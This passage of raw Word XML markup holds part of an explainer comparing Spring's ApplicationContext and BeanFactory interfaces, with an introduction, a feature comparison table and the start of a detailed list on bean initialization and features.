          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ontext and </w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ean</w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>actory in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p w14:paraId="444E31BC" w14:textId="2E97A682" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two important interfaces in Spring that provide access to the Spring IoC (Inversion of Control) container. Both are responsible for managing beans, but they differ in terms of features, functionality, and their typical use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D6DBAE" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Difference between ApplicationContext and BeanFacto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43"/>
        <w:gridCol w:w="3124"/>
        <w:gridCol w:w="4637"/>
      </w:tblGrid>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="562C8B35" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB668A4" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004859E3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD951E4" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004859E3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BeanFactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F276A79" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004859E3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ApplicationContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="49D34DB3" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E555C9"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Base Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A18B837"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BeanFactory is the root interface for the Spring IoC container.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315FF8AA"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ApplicationContext is an extension of BeanFactory. It provides more advanced features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="392A0961" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A58B1DB"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Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47ABF2A1"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Beans are created only when requested (lazy initialization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A87DCB0"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Beans are created eagerly, i.e., beans are loaded during the startup of the application (eager initialization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="35315E50" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB6A5FB"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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="260A5C8F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Basic configuration for bean management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="768DB3A3"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports more advanced configuration, including internationalization, event propagation, and other features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="1B133947" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41FC04B2"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lastRenderedPageBreak/>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4CEE23"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Provides basic functionality like bean creation, configuration, and access to beans.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E58ADE0"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Provides additional functionality such as event propagation, AOP (Aspect-Oriented Programming), annotation-based configuration, internationalization, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="7E264CB9" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B891689"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Common Implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65325305"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>XmlBeanFactory (deprecated), DefaultListableBeanFactory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56A7CB12"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ClassPathXmlApplicationContext, AnnotationConfigApplicationContext, GenericWebApplicationContext, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="31DB0488" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E5A5796"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Event Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ADECB12"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No event handling support.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20212026"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports event handling and propagation (e.g., ApplicationEventPublisher).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="3DFB2CCA" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A49AE1F"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Internationalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37A9B780"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No support for internationalization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F173FC"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports internationalization using MessageSource.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="2FA4DCBB" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F21B98"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BeanPostProcessor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E198ABB"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports bean post-processing via BeanPostProcessor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EC1315"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports BeanPostProcessor and additionally allows more sophisticated bean management features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="4C0160B2" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62B4AC13"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Autowiring Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483A534E"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports autowiring of beans via XML-based configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009AC197"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports autowiring and annotations like @Autowired and @Qualifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="37D58D73" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BE77843"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ApplicationContextAware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FD815A"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No support for ApplicationContextAware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D581975"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supports ApplicationContextAware to allow beans to access the ApplicationContext they belong to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="198FF3CE" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16A036A4"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5CFE75"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used in scenarios where a lightweight container is sufficient.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599A8FEA" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004859E3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Typically used in most Spring-based applications because of its extended functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4288D99D" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Differences in Detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17112338" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1855"/>
        </w:num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Initialization of Beans</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0780E441" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans are created lazily, meaning they are created only when requested (via methods like getBean()). This can be beneficial for memory management when beans are not required immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C13AF8" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans are created eagerly when the application context is initialized. This means beans are created as soon as the application context is loaded, making it easier to manage dependencies upfront.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00467C" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1855"/>
        </w:num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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9CEFC5" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides basic functionality for bean management such as bean creation, wiring, and lifecycle management. It doesn't offer advanced features like event propagation, internationalization, or annotation-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA7219E" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1855"/>
        </w:num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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides additional features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1AE6D" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1855"/>
        </w:num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Event propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Application contexts can publish and listen for events (e.g., ContextRefreshedEvent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D412C" w14:textId="77777777" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1855"/>
